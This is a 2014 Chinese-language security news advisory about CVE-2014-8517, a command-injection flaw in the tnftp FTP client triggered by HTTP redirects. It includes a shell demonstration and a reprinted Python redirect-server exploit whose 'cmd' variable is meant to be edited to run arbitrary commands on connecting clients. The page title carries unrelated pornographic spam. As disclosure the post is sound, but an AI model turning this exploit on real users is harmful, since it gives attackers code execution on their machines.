压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

漏洞預警:FTP曝嚴重遠程執(zhí)行漏洞,影響多個版本Unix(附檢

責編:admin |2014-10-30 14:26:48

  10月28日,一份公開的郵件中曝出FTP遠程執(zhí)行命令漏洞,漏洞影響到的Unix系統(tǒng)包括:Fedora, Debian, NetBSD, FreeBSD, OpenBSD, 甚至影響到了蘋果的OS X操作系統(tǒng)的最新版本Yosemite 10.10。

  NetBSD的一位開發(fā)人員(Jared McNeill)證實了這個漏洞可以通過tnftp從WEB服務(wù)器遠程執(zhí)行惡意命令,并且此漏洞已被編號為CVE-2014-8517 :

  a20$ pwd

  /var/www/cgi-bin

  a20$ ls -l

  total 4

  -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect

  -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a

  a20$ cat redirect

  #!/bin/sh

  echo 'Status: 302 Found'

  echo 'Content-Type: text/html'

  echo 'Connection: keep-alive'

  echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'

  echo

  a20$

  a20$ ftp http://localhost/cgi-bin/redirect

  Trying ::1:80 …

  ftp: Can't connect to `::1:80': Connection refused

  Trying 127.0.0.1:80 …

  Requesting http://localhost/cgi-bin/redirect

  Redirected to http://192.168.2.19/cgi-bin/|uname%20-a

  Requesting http://192.168.2.19/cgi-bin/|uname%20-a

  32      101.46 KiB/s

  32 bytes retrieved in 00:00 (78.51 KiB/s)

  NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36

  ADT 2014

  Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE

  BOARD evbarm

  a20$

  漏洞影響范圍及公告

  Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple等系統(tǒng)開發(fā)商已經(jīng)意識到了此漏洞的危害,其中Debian, Red Hat, Gnetoo and Novell已經(jīng)發(fā)出了漏洞公告:

  漏洞檢測腳本(請勿用于非法用途)

  #!/usr/bin/env python

  """

  Sample OSX/BSD FTP client exploit. Written because ISO policies were doing

  my head in. To exploit, edit the value of the cmd variable, then run the

  script. To test:

  ftp http://<myserver>/foo

  And you should see the command executed.

  All wrongs reversed – @stevelord

  """

  import BaseHTTPServer

  import sys

  import socket

  import urllib

  hostname = socket.getfqdn() # Set this to your IP if you have no FQDN

  port = 8000 # Set this to the port you want to run this on

  cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."

  cmd = urllib.quote(cmd)

  redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd

  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):

  def do_GET(s):

  if cmd in s.path:

  s.send_response(200)

  s.end_headers()

  else:

  s.send_response(302)

  s.send_header("Location", redir)

  s.end_headers()

  if __name__ == "__main__":

  print "redirecting to,", redir

  server_class = BaseHTTPServer.HTTPServer

  httpd = server_class((hostname, port), RedirectHandler)

  try:

  httpd.serve_forever()

  print "Started serving."

  except KeyboardInterrupt:

  pass

  httpd.server_close()

  print "
Stopped serving."

 

上一篇:智能無懼挑戰(zhàn) 山石網(wǎng)科轟動RSA2015

下一篇:美國電信Verizon被曝追蹤移動用戶的日常活動